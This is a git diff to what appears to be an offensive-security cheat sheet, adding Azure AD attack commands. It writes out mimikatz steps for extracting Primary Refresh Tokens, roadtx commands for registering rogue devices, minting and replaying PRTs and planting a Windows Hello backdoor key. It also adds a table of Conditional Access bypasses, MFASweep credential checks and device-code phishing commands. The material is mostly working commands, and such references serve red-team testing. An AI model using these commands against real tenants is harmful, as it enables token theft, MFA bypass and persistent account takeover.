diff --git a/assets/banner.png b/assets/banner.png
index 1ab6ef26..f0f13b4a 100755
Binary files a/assets/banner.png and b/assets/banner.png differ
diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md
index c322c3cd..59396a0a 100644
--- a/docs/cloud/azure/azure-access-and-token.md
+++ b/docs/cloud/azure/azure-access-and-token.md
@@ -95,6 +95,16 @@ Mail.ReadWrite.All  https://graph.microsoft.com             00b41c95-dab0-4487-9
     ```
 
 
+### Extract PRT v1
+
+```ps1
+mimikatz # sekurlsa::cloudap
+mimikatz # sekurlsa::dpapi
+mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
+roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url https://portal.azure.com
+```
+
+
 ### Extract PRT on Device with TPM
 
 * No method known to date.
@@ -103,11 +113,17 @@ Mail.ReadWrite.All  https://graph.microsoft.com             00b41c95-dab0-4487-9
 ### Generate a PRT by registering a device
 
 ```ps1
-roadtx interactiveauth -u user.lastname@domain.local -p password123 -r devicereg
-roadtx device -n devicename
-roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem
-roadtx prtenrich –prt roadtx.prt
-roadtx prt -u user.lastname@domain.local -p password123 –-key-pem devicename.key –-cert-pem devicename.pem -r 0.AVAApQL<snip>
+# Get correct token audience
+roadtx gettokens -c 29d9ed98-a469-4536-ade2-f981bc1d605e -r urn:ms-drs:enterpriseregistration.windows.net --refresh-token file
+
+# Registering device
+roadtx device -a register -n <device-name>
+
+# Request PRT 
+roadtx prt --refresh-token <refresh-token> -c <device-name>.pem -k <device-name>.key
+
+# Use a PRT
+roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
 ```
 
 
diff --git a/docs/cloud/azure/azure-devices-users-services.md b/docs/cloud/azure/azure-devices-users-services.md
index 0949f172..cd8e733c 100644
--- a/docs/cloud/azure/azure-devices-users-services.md
+++ b/docs/cloud/azure/azure-devices-users-services.md
@@ -25,7 +25,24 @@
 
 ### Join Devices
 
+* [Enroll Windows 10/11 devices in Intune](https://learn.microsoft.com/en-us/mem/intune/user-help/enroll-windows-10-device)
+
+
 ### Register Devices
 
+```ps1
+roadtx device -a register -n swkdeviceup
+```
+
+
+### Windows Hello for Business
+
+```ps1
+roadtx.exe prtenrich --ngcmfa-drs-auth
+roadtx.exe winhello -k swkdevicebackdoor.key
+roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
+roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com
+```
+
 
 # Service Principals
\ No newline at end of file
diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md
index f2d8ac66..ebe57be8 100644
--- a/docs/cloud/azure/azure-enumeration.md
+++ b/docs/cloud/azure/azure-enumeration.md
@@ -22,17 +22,30 @@ Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
     ```
 
 
-## Azure AD - Conditionnal Access Policy
+## Azure AD - Conditional Access Policy
 
-Enumerate Conditionnal Access Policies: `roadrecon plugin policies`
+Conditional Access is used to restrict access to resources to compliant devices only.
 
+* Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
 
+| CAP                       | Bypass  |
+|---------------------------|---------|
+| Location / IP ranges      | Corporate VPN, Guest Wifi |
+| Platform requirement      | User-Agent switcher (Android, PS4, Linux, ...) |
+| Protocol requirement      | Use another protocol (e.g for e-mail acccess:  POP, IMAP, SMTP) |
+| Azure AD Joined Device    | Try to join a VM (Work Access)|
+| Device requirement        | / |
+| MFA                       | / |
+| Legacy Protocols          | / |
+| Compliant Device (Intune) | / |
+| Domain Joined             | / |
 
 
 ## Azure AD - MFA
 
 * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
 ```ps1
+Import-Module .\MFASweep.ps1
 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
 ```
diff --git a/docs/cloud/azure/azure-phishing.md b/docs/cloud/azure/azure-phishing.md
index 98b35b06..243e2272 100644
--- a/docs/cloud/azure/azure-phishing.md
+++ b/docs/cloud/azure/azure-phishing.md
@@ -83,6 +83,11 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
 ## Device Code Phishing
 
 * Using roadtool: `roadtx gettokens -u user@domain.lab --device-code`
+    ```ps1
+    roadtx.exe auth --device-code -c 29d9ed98-a469-4536-ade2-f981bc1d605e
+    Requesting token for resource https://graph.windows.net
+    To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXXX to authenticate.
+    ```
 
 * Using TokenTactics to request a token for Azure Graph API using a device code
     ```ps1